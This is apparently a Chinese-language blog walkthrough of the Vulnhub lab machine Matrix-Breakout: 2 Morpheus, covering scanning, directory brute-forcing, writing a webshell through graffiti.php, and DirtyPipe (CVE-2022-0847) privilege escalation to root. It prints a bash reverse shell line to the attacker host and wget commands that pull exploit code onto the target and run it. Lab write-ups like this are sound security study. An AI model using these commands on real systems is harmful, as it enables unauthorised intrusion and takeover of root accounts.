Vulnhub: Matrix-Breakout: 2 Morpheus靶机

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.130

Vulnhub: Matrix-Breakout: 2 Morpheus靶机_第1张图片

目录爆破

feroxbuster -k -d 1 --url http://192.168.111.130 -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x php,bak,txt,html,sql,zip,phtml,sh,pcapng,pcap -t 1 -e -C 404,500

graffiti.php页面的文本框输入内容会写入graffiti.txt

Vulnhub: Matrix-Breakout: 2 Morpheus靶机_第2张图片

Vulnhub: Matrix-Breakout: 2 Morpheus靶机_第3张图片

用burp改包写入webshell

Vulnhub: Matrix-Breakout: 2 Morpheus靶机_第4张图片

Vulnhub: Matrix-Breakout: 2 Morpheus靶机_第5张图片

Vulnhub: Matrix-Breakout: 2 Morpheus靶机_第6张图片

反弹shell需要url编码后再执行

bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'

Vulnhub: Matrix-Breakout: 2 Morpheus靶机_第7张图片

Vulnhub: Matrix-Breakout: 2 Morpheus靶机_第8张图片

提权

用linpeas.sh收集到目标存在CVE-2022-0847,exp地址:https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit

Vulnhub: Matrix-Breakout: 2 Morpheus靶机_第9张图片

利用过程

#kali开启http服务
python3 -m http.server
 ​
#目标上执行
wget http://192.168.111.111:8000/exploit.c
wget http://192.168.111.111:8000/compile.sh
chmod 777 compile.sh
./compile.sh
./exploit
su root         #root用户的密码被改为aaron

Vulnhub: Matrix-Breakout: 2 Morpheus靶机_第10张图片

Vulnhub: Matrix-Breakout: 2 Morpheus靶机_第11张图片

flag

Vulnhub: Matrix-Breakout: 2 Morpheus靶机_第12张图片

你可能感兴趣的:(安全,web安全,网络安全)